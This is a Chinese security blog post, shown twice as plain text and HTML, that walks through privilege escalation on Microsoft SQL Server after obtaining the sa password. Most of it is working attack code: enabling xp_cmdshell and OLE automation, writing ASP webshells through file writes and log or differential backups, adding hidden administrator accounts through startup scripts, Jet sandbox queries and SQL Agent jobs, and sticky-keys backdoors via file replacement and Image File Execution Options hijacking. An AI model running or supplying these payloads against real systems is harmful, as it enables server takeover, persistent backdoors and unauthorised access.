Mssql提权

博主： alexsel
发布时间：2020 年 05 月 24 日
2472 次浏览
暂无评论
8914字数
分类：网络安全

前言

我们在提权的过程中，如果遇到无法使用系统溢出漏洞进行提权的时候，我们就可以尝试使用数据库进行提权，不过使用数据库提权有相应的条件，一般情况下需要我们服务器开启数据库服务以及获取到最高权限用户的密码，处理Access数据库之外，其他数据库都存在数据库提权的可能。针对于数据库密码的获取一般情况下可以通过数据库配置文件获取。

MSSQL提权

xp_cmdshell提权

xp_cmdshell在mssql2000中是默认开启的，不过在mssql2005之后的版本中则是默认关闭的，如果我们想要继续使用它，只有在我们是管理员SA权限得到情况下使用sp_configure重新开启xp_cmdshell命令，如果mssql被降权那么我们也无法完成提权。

之前我们也提到了，默认情况下是关闭xp_cmdshell的，如果要开启xp_cmdshell我们需要有sa权限，所以这里我们代码的演示就直接在mssql中进行操作，这里sqlserver的版本是2005。

查看xp_cmdshell是否被删除

我们使用sa账户登录到数据库之后，在数据库->系统数据库->master->可编程性->扩展存储过程->系统扩展存储过程z中我们可以看到sys.xp_cmdshell这个命令，如果这个命令不存在那就说明，这个命令被删除了，如果命令存在但是无法使用，那就说明命令被禁止了。

恢复xp_cmdshell命令

首先我们测试xp_cmdshell命令是否可以使用

EXEC master.dbo.xp_cmdshell 'whoami';

我们可以看到，命令被禁用了，接下来我们启用xp_cmdshell命令

EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

第一条语句是开启编辑状态，第二条语句是将xp_cmdshell设置为可用。

紧接着我们就可以继续测试xp_cmdshell时候可用以及当前用户权限

我们可以看到权限是system，不过我在另一个2008的系统mssql2012版本测试的时候遇到了被降权的情况，我们同样使用如上命令，返回的权限是network server，如果被降权那就无法完成提权。

无论结果怎么样，我们还是要善后的，将xp_cmdshell命令修改为禁用

EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

sp_oacreate提权

sp_oacreate在 SQL Server实例上创建OLE对象实例，我们在遇到xp_cmdshell被删除的情况下可以尝试使用这个命令来提权。默认情况下这个命令也是被禁用的，我们接下来继续恢复并执行其他命令。

恢复sp_oacreate并执行命令

开启存储过程来恢复sp_oacreate命令的使用

EXEC sp_configure 'show advanced options', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'Ole Automation Procedures', 1;   
RECONFIGURE WITH OVERRIDE;

执行whoami命令并输出到C盘下的1.txt。

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt';

sp_oacreate的其他操作

删除文件

declare @result int
declare @fso_token int
exec sp_oacreate 'scripting.filesystemobject', @fso_token out
exec sp_oamethod @fso_token,'deletefile',null,'c:\1.txt'
exec sp_oadestroy @fso_token

复制文件

declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'copyfile',null,'c:\1.txt','c:\2.txt'

移动文件

declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'movefile',null,'c:\1.txt','c:\3.txt'

替换粘滞键

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o,'copyfile',null,'c:\windows\explorer.exe', 'c:\windows\system32\sethc.exe'
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo i=out
exec sp_oamethod @oo,'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\sethc.exe'

启动项中写入添加账户脚本

declare @sp_passwordxieo int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out
exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","123$")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/123$",user)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/123$"';

COM组件的利用(cmd.exe可以自行上传)

declare @luan int,@exec int,@text int,@str varchar(8000);
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@luan output; 
exec sp_oamethod @luan,'exec',@exec output,'C:\\phpstudy\\www\\test.com\\cmd.exe /c whoami';
exec sp_oamethod @exec, 'StdOut', @text out;
exec sp_oamethod @text, 'readall', @str out
select @str;

四种文件写入的方法

这几种文件写入的方法需要满足物理路径已知，拥有sa权限。

第一种存储过程写文件

declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\\phpstudy\\www\\cbd.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'<%execute(request("a"))%>'

第二种存储过程写文件

declare @s nvarchar(4000);select @s=0x730065006c00650063007400200027003c00250045007800650063007500740065002800720065007100750065007300740028002200610022002900290025003e000d000a002700;exec sp_makewebtask 0x43003a005c007a00770065006c006c002e00610073007000, @s;--

第三种，log备份

alter database 库名 set RECOVERY FULL 
create table cmd (a image) 
backup log 库名 to disk = 'c:\' with init 
insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253E) 
backup log 库名 to disk = 'c:\2.asp'

第四种，差异备份

backup database 库名 to disk = 'c:\bak.bak';--
create table [dbo].[test] ([cmd] [image]);
insert into test(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
backup database 库名 to disk='C:\d.asp' WITH DIFFERENTIAL,FORMAT;--

沙盒提权

在SQL2005中默认禁用Ad Hoc Distributed，执行命令时，会提示错误，所以我们需要手动开启。这种提权的方式一般很少用到。

exec sp_configure 'show advanced options',1 ;
reconfigure ;
exec sp_configure 'Ad Hoc Distributed Queries',1 ;
reconfigure;

恢复对注册表的读写

dbcc addextendedproc ('xp_regread','xpstar.dll')
dbcc addextendedproc ('xp_regwrite','xpstar.dll')

修复沙盒的维护模式

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;

查看SandBoxMode的值是否已经变成了0

沙盒模式参数含义：

沙盒模式SandBoxMode参数含义（默认是2）

0：在任何所有者中禁止启用安全模式
1 ：为仅在允许范围内
2 ：必须在access模式下
3 ：完全开启

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'

创建账户

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user sql$ 123 /add")');

添加到管理员组

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators sql$ /add")');

如果遇到问题参考这里的解析：http://blog.chinaunix.net/uid-28966230-id-4291781.html

恢复配置

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;
exec sp_configure 'Ad Hoc Distributed Queries',0;reconfigure;
exec sp_configure 'show advanced options',0;reconfigure;

JOB提权

原理是创建一个任务x，并执行命令，命令执行后的结果，将返回给文档q.txt

首先需要启动sqlagent服务：

exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'

接下来我们创建任务x，执行添加账户的命令，然后将命令返回结果输出到q.txt中。

use msdb
exec sp_delete_job null,'x'
exec sp_add_job 'x'
exec sp_add_jobstep null,'x',null,'1','cmdexec','cmd /c "net user hack1 hack1 /add &net localgroup administrators hack1 /add>c:/q.txt"'
exec sp_add_jobserver null,'x',@@servername
exec sp_start_job 'x';

执行成功，这个报错应该是同时执行多条语句导致，我们可以看到最终添加了指定的账户。

利用镜像劫持提权

首先我们利用regwrite函数修改组册表进行劫持，这里如果regwrite执行失败参考上面的开启方法。

EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',@value_name='Debugger',@type='REG_SZ',@value='c:\windows\system32\cmd.exe'

接着我们查看是否劫持成功

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

紧接着我们远程连接桌面，然后连续按5次shift就可以调用cmd窗口

最后修改：2020 年 09 月 20 日

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

PHP_Session反序列化漏洞
浏览次数: 5909
10种方法绕过云锁以及tamper
浏览次数: 5727
红队实验七
浏览次数: 3279
Bypass-云锁绕过
浏览次数: 3205
Linux提权总结
浏览次数: 2749

111
师傅好文章，图片坏了好多
Ulysses
不过最新版的云锁已经不能用这种方法绕过了⌇●﹏●⌇
Ulysses
真榜！学到了ヾ(≧∇≦*)ゝ
未尽
感谢师傅提供的思路，能否给个收款码，请师傅喝杯咖啡。

CVE-2020-1472复现
浏览次数: 2262
Java动态类加载
浏览次数: 584
PE结构三
浏览次数: 1254
PHP高级开发
浏览次数: 573
C语言-二维数组
浏览次数: 1246

Mssql提权

alexsel • 2020 年 05 月 24 日

<h2>前言</h2>我们在提权的过程中，如果遇到无法使用系统溢出漏洞进行提权的时候，我们就可以尝试使用数据库进行提权，不过使用数据库提权有相应的条件，一般情况下需要我们服务器开启数据库服务以及获取到最高权限用户的密码，处理Access数据库之外，其他数据库都存在数据库提权的可能。针对于数据库密码的获取一般情况下可以通过数据库配置文件获取。<h2>MSSQL提权</h2><h3>xp_cmdshell提权</h3><code>xp_cmdshell</code>在<code>mssql2000</code>中是默认开启的，不过在<code>mssql2005</code>之后的版本中则是默认关闭的，如果我们想要继续使用它，只有在我们是管理员<code>SA</code>权限得到情况下使用<code>sp_configure</code>重新开启<code>xp_cmdshell</code>命令，如果<code>mssql</code>被降权那么我们也无法完成提权。之前我们也提到了，默认情况下是关闭<code>xp_cmdshell</code>的，如果要开启<code>xp_cmdshell</code>我们需要有<code>sa</code>权限，所以这里我们代码的演示就直接在<code>mssql</code>中进行操作，这里<code>sqlserver</code>的版本是2005。<h4>查看xp_cmdshell是否被删除</h4>我们使用<code>sa</code>账户登录到数据库之后，在<code>数据库-&gt;系统数据库-&gt;master-&gt;可编程性-&gt;扩展存储过程-&gt;系统扩展存储过程</code>z中我们可以看到<code>sys.xp_cmdshell</code>这个命令，如果这个命令不存在那就说明，这个命令被删除了，如果命令存在但是无法使用，那就说明命令被禁止了。<h4>恢复xp_cmdshell命令</h4>首先我们测试<code>xp_cmdshell</code>命令是否可以使用<pre><code class="lang-mssql">EXEC master.dbo.xp_cmdshell 'whoami';</code></pre><img src="https://www.helloimg.com/images/2020/09/20/1b4c59dd497628c21.png" alt="" title="" style="">我们可以看到，命令被禁用了，接下来我们启用<code>xp_cmdshell</code>命令<pre><code class="lang-mssql">EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;</code></pre><img src="https://www.helloimg.com/images/2020/09/20/248976f938895e48a.png" alt="" title="" style="">第一条语句是开启编辑状态，第二条语句是将<code>xp_cmdshell</code>设置为可用。紧接着我们就可以继续测试<code>xp_cmdshell</code>时候可用以及当前用户权限<img src="https://www.helloimg.com/images/2020/09/20/35b9e8aab026051bc.png" alt="" title="" style="">我们可以看到权限是<code>system</code>，不过我在另一个2008的系统<code>mssql2012</code>版本测试的时候遇到了被降权的情况，我们同样使用如上命令，返回的权限是<code>network server</code>，如果被降权那就无法完成提权。<img src="https://www.helloimg.com/images/2020/09/20/4d2879fc1dbc31d70.png" alt="" title="" style="">无论结果怎么样，我们还是要善后的，将<code>xp_cmdshell</code>命令修改为禁用<pre><code class="lang-mssql">EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;</code></pre><h3>sp_oacreate提权</h3><code>sp_oacreate</code>在 <code>SQL Server</code>实例上创建<code>OLE</code>对象实例，我们在遇到<code>xp_cmdshell</code>被删除的情况下可以尝试使用这个命令来提权。默认情况下这个命令也是被禁用的，我们接下来继续恢复并执行其他命令。<h4>恢复sp_oacreate并执行命令</h4>开启存储过程来恢复<code>sp_oacreate</code>命令的使用<pre><code class="lang-mssql">EXEC sp_configure 'show advanced options', 1; 
RECONFIGURE WITH OVERRIDE; 
EXEC sp_configure 'Ole Automation Procedures', 1; 
RECONFIGURE WITH OVERRIDE; </code></pre><img src="https://www.helloimg.com/images/2020/09/20/5cf0c82554401b490.png" alt="" title="" style="">执行<code>whoami</code>命令并输出到C盘下的<code>1.txt</code>。<pre><code class="lang-mssql">declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami &gt;c:\\1.txt';</code></pre><img src="https://www.helloimg.com/images/2020/09/20/665af1ed5d3e3bcd7.png" alt="" title="" style=""><h4>sp_oacreate的其他操作</h4>删除文件<pre><code class="lang-mssql">declare @result int
declare @fso_token int
exec sp_oacreate 'scripting.filesystemobject', @fso_token out
exec sp_oamethod @fso_token,'deletefile',null,'c:\1.txt'
exec sp_oadestroy @fso_token</code></pre>复制文件<pre><code class="lang-mssql">declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'copyfile',null,'c:\1.txt','c:\2.txt'</code></pre>移动文件<pre><code class="lang-mssql">declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'movefile',null,'c:\1.txt','c:\3.txt'</code></pre>替换粘滞键<pre><code class="lang-mssql">declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o,'copyfile',null,'c:\windows\explorer.exe', 'c:\windows\system32\sethc.exe'
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo i=out
exec sp_oamethod @oo,'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\sethc.exe'</code></pre>启动项中写入添加账户脚本<pre><code class="lang-mssql">declare @sp_passwordxieo int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out
exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject(&quot;WSCRIPT.NETWORK&quot;)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os=&quot;WinNT://&quot;&amp;wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&amp;&quot;/Administrators,group&quot;)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create(&quot;user&quot;,&quot;123$&quot;)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword &quot;123&quot;'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&amp;&quot;/123$&quot;,user)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&amp;&quot;/123$&quot;';</code></pre>COM组件的利用(cmd.exe可以自行上传)<pre><code class="lang-mssql">declare @luan int,@exec int,@text int,@str varchar(8000);
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@luan output; 
exec sp_oamethod @luan,'exec',@exec output,'C:\\phpstudy\\www\\test.com\\cmd.exe /c whoami';
exec sp_oamethod @exec, 'StdOut', @text out;
exec sp_oamethod @text, 'readall', @str out
select @str;</code></pre><h4>四种文件写入的方法</h4>这几种文件写入的方法需要满足物理路径已知，拥有<code>sa</code>权限。第一种存储过程写文件<pre><code class="lang-mssql">declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\\phpstudy\\www\\cbd.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'&lt;%execute(request(&quot;a&quot;))%&gt;' </code></pre>第二种存储过程写文件<pre><code class="lang-mssql">declare @s nvarchar(4000);select @s=0x730065006c00650063007400200027003c00250045007800650063007500740065002800720065007100750065007300740028002200610022002900290025003e000d000a002700;exec sp_makewebtask 0x43003a005c007a00770065006c006c002e00610073007000, @s;--</code></pre>第三种，log备份<pre><code class="lang-mssql">alter database 库名 set RECOVERY FULL 
create table cmd (a image) 
backup log 库名 to disk = 'c:\' with init 
insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253E) 
backup log 库名 to disk = 'c:\2.asp'</code></pre>第四种，差异备份<pre><code class="lang-mssql">backup database 库名 to disk = 'c:\bak.bak';--
create table [dbo].[test] ([cmd] [image]);
insert into test(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
backup database 库名 to disk='C:\d.asp' WITH DIFFERENTIAL,FORMAT;--</code></pre><h3>沙盒提权</h3>在SQL2005中默认禁用<code>Ad Hoc Distributed</code>，执行命令时，会提示错误，所以我们需要手动开启。这种提权的方式一般很少用到。<pre><code class="lang-mssql">exec sp_configure 'show advanced options',1 ;
reconfigure ;
exec sp_configure 'Ad Hoc Distributed Queries',1 ;
reconfigure;</code></pre><img src="https://www.helloimg.com/images/2020/09/20/76fa930f4d416e105.png" alt="" title="" style="">恢复对注册表的读写<pre><code class="lang-mssql">dbcc addextendedproc ('xp_regread','xpstar.dll')
dbcc addextendedproc ('xp_regwrite','xpstar.dll')</code></pre>修复沙盒的维护模式<pre><code class="lang-mssql">exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;</code></pre><img src="https://www.helloimg.com/images/2020/09/20/8bf785066d9938cee.png" alt="" title="" style="">查看<code>SandBoxMode</code>的值是否已经变成了0沙盒模式参数含义：沙盒模式SandBoxMode参数含义（默认是2）<ul><li>0：在任何所有者中禁止启用安全模式</li><li>1 ：为仅在允许范围内</li><li>2 ：必须在access模式下</li><li>3 ：完全开启</li></ul><pre><code class="lang-mssql">exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'</code></pre><img src="https://www.helloimg.com/images/2020/09/20/979d6a48af88e1611.png" alt="" title="" style="">创建账户<pre><code class="lang-mssql">Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell(&quot;net user sql$ 123 /add&quot;)');</code></pre>添加到管理员组<pre><code class="lang-mssql">Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell(&quot;net localgroup administrators sql$ /add&quot;)');</code></pre>如果遇到问题参考这里的解析：<a class="no-external-link" href="http://blog.chinaunix.net/uid-28966230-id-4291781.html" target="_blank">http://blog.chinaunix.net/uid-28966230-id-4291781.html</a>恢复配置<pre><code class="lang-mssql">exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;
exec sp_configure 'Ad Hoc Distributed Queries',0;reconfigure;
exec sp_configure 'show advanced options',0;reconfigure;</code></pre><h3>JOB提权</h3>原理是创建一个任务x，并执行命令，命令执行后的结果，将返回给文档q.txt首先需要启动sqlagent服务：<pre><code class="lang-mssql">exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'</code></pre><img src="https://www.helloimg.com/images/2020/09/20/1041cd92edbae94363.png" alt="" title="" style="">接下来我们创建任务x，执行添加账户的命令，然后将命令返回结果输出到<code>q.txt</code>中。<pre><code class="lang-mssql">use msdb
exec sp_delete_job null,'x'
exec sp_add_job 'x'
exec sp_add_jobstep null,'x',null,'1','cmdexec','cmd /c &quot;net user hack1 hack1 /add &amp;net localgroup administrators hack1 /add&gt;c:/q.txt&quot;'
exec sp_add_jobserver null,'x',@@servername
exec sp_start_job 'x';</code></pre><img src="https://www.helloimg.com/images/2020/09/20/11dc31fc1cb93c34e0.png" alt="" title="" style="">执行成功，这个报错应该是同时执行多条语句导致，我们可以看到最终添加了指定的账户。<h3>利用镜像劫持提权</h3>首先我们利用<code>regwrite</code>函数修改组册表进行劫持，这里如果<code>regwrite</code>执行失败参考上面的开启方法。<pre><code class="lang-mssql">EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',@value_name='Debugger',@type='REG_SZ',@value='c:\windows\system32\cmd.exe'</code></pre><img src="https://www.helloimg.com/images/2020/09/20/12ad3c5af3090bd59c.png" alt="" title="" style="">接着我们查看是否劫持成功<pre><code class="lang-mssql">exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'</code></pre><img src="https://www.helloimg.com/images/2020/09/20/1355e2ee7edc3cbd69.png" alt="" title="" style="">紧接着我们远程连接桌面，然后连续按5次<code>shift</code>就可以调用<code>cmd</code>窗口<img src="https://www.helloimg.com/images/2020/09/20/146b3fa768fe830dec.png" alt="" title="" style="">

前言

MSSQL提权

xp_cmdshell提权

查看xp_cmdshell是否被删除

恢复xp_cmdshell命令

sp_oacreate提权

恢复sp_oacreate并执行命令

sp_oacreate的其他操作

四种文件写入的方法

沙盒提权

JOB提权

利用镜像劫持提权

发表评论 取消回复 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

Mssql提权

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款